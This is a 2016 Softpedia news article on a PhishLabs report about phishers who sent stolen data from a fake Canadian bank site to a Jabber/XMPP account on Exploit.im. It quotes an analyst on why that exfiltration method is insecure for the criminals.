Crooks opt for an insecure method of collecting phished data

Aug 11, 2016 17:01 GMT  ·  By
Crane Hassold, PhishLabs: Gmail the favorite email provider used in phishing campaigns for exfiltrating compromised data
2 photos
   Crane Hassold, PhishLabs: Gmail the favorite email provider used in phishing campaigns for exfiltrating compromised data

Cyber-criminals dabbling in phishing campaigns are experimenting with a new method of exfiltrating data from phishing websites, relying on the Jabber service to send data to their XMPP accounts, according to a report shared with Softpedia by PhishLabs, a company specialized in detecting and preventing phishing attacks.

Phishing attacks rely on drawing a victim to a malicious website that looks like a legitimate service, and tricking the user into entering sensitive information on this fake website. All the data the user enters gets logged and sent to the attacker.

This "logging and sending" phase is usually handled by special code inside the website's source. Because of the plethora of readily available PHP mailer scripts, most crooks use PHP for this task and opt to send the data to email accounts they have specifically set up to receive compromised information.

There were also campaigns where crooks send phished data to remote MySQL databases, but in the vast majority of instances, mailing the stolen data is the main method of collecting stolen information.

Campaign against Canadian financial institution uses Jabber/XMPP

In a recent phishing campaign that targeted a Canadian financial institution, PhishLabs showed Softpedia it found evidence in the phishing site's source code of how the crooks were sending compromised information to a Jabber/XMPP account.

Whenever the crook logged into this account, he'd find offline messages holding data collected from the phishing website.

The crook's particular choice for the XMPP server was Exploit.im, the infamous Russian-based Jabber service also used by numerous other criminals in the past.

This includes Tessa88(aka [email protected]), one of the persons behind some recent mega breaches like MySpace and LinkedIn, and Rory Guidry (aka [email protected]), a hacker arrested after selling botnets on the Darkode hacking forum.

Sending data via Jabber is insecure

"It is unknown why the phishers in this campaign have used Jabber as the exfiltration method," PhishLabs expert Crane Hassold told Softpedia.

"It’s a curious choice since, absent the use of encryption and without having control of the Jabber server, there is nothing stopping the administrator of the server from scanning and logging the contents of the messages being sent that contain the compromised information."

"It does show, however, that phishers are continually developing new methods to facilitate their malicious activities," Crane added.

Code for sending collected data via Jabber
Code for sending collected data via Jabber

Photo Gallery (2 Images)

Crane Hassold, PhishLabs: Gmail the favorite email provider used in phishing campaigns for exfiltrating compromised data
Code for sending collected data via Jabber
Open gallery